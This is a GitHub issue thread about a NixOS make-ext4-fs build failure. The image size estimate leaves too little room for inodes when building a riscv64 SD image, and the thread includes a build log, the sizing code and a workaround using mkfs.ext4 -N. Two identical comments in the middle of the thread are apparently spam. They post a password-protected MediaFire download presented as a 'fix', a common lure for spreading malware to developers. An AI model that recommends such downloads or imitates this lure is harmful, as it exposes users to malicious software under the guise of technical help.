### ISSUE TITLE
Build failure: make-ext4-fs

### ISSUE THREAD

**Issue by gangaram-tii** [NixOS/nixpkgs#337884]
### Steps To Reproduce

Cross compile `sdimage` for Microchip Icicle Kit(`riscv64`) from `x86_64` machine.
Make sure `binfmt` is enable for `riscv64` architecture.
```
> git clone https://github.com/gangaram-tii/ghaf.git
> cd ghaf
> git checkout ec9377d80
> nix build .#microchip-icicle-kit-release-from-x86_64
```
### Build log

```
Preparing store paths for image...
Creating an EXT4 image of 1846812672 bytes (numInodes=113413, numDataBlocks=224056)
mke2fs 1.47.1 (20-May-2024)
Discarding device blocks: done
Creating filesystem with 450882 4k blocks and 112896 inodes
Filesystem UUID: 44444444-4444-4444-8888-888888888888
Superblock backups stored on blocks:
        32768, 98304, 163840, 229376, 294912
Allocating group tables: done
Writing inode tables: done
Creating journal (8192 blocks): done
Copying files into the device: __populate_fs: Could not allocate inode in ext2 filesystem while writing file "AOR"
mkfs.ext4: Could not allocate inode in ext2 filesystem while populating file system
```

### Additional context
Root fs size is more than the disk image size.
See file `nixos/lib/make-ext4-fs.nix` snippet
```
numInodes=$(find ./rootImage | wc -l)
numDataBlocks=$(du -s -c -B 4096 --apparent-size ./rootImage | tail -1 | awk '{ print int($1 * 1.10) }')
bytes=$((2 * 4096 * $numInodes + 4096 * $numDataBlocks))
```
10% extra space may not be enough in some cases.

In my case, apparent size of rootfs is 344337 data blocks, while it's size on disk is 451539 data blocks. so 10% extra space may not be enough in some cases.

### Metadata

Please run `nix-shell -p nix-info --run "nix-info -m"` and paste the result.

```console
[user@system:~]$ nix-shell -p nix-info --run "nix-info -m"
 - system: `"x86_64-linux"`
 - host os: `Linux 6.1.84, NixOS, 23.11 (Tapir), 23.11.5833.1487bdea619e`
 - multi-user?: `yes`
 - sandbox: `yes`
 - version: `nix-env (Nix) 2.18.1`
 - channels(root): `"nixos-23.11"`
 - nixpkgs: `/nix/var/nix/profiles/per-user/root/channels/nixos`
```

---

Add a :+1: [reaction] to [issues you find important].

[reaction]: https://github.blog/2016-03-10-add-reactions-to-pull-requests-issues-and-comments/
[issues you find important]: https://github.com/NixOS/nixpkgs/issues?q=is%3Aissue+is%3Aopen+sort%3Areactions-%2B1-desc

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Dnts1** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by b2ag** [comment]
Hi,

I hit a similar error when building an armv7l image with QEMU binfmt wrapper today. Pulling this commit into my 24.05 build didn't resolve it for me though. `mkfs.ext4` still guessed 6000 inodes less then the `buildCommand` computed by `find |wc -l`. 

`mkfs.ext4 -N $numInodes` worked for me.
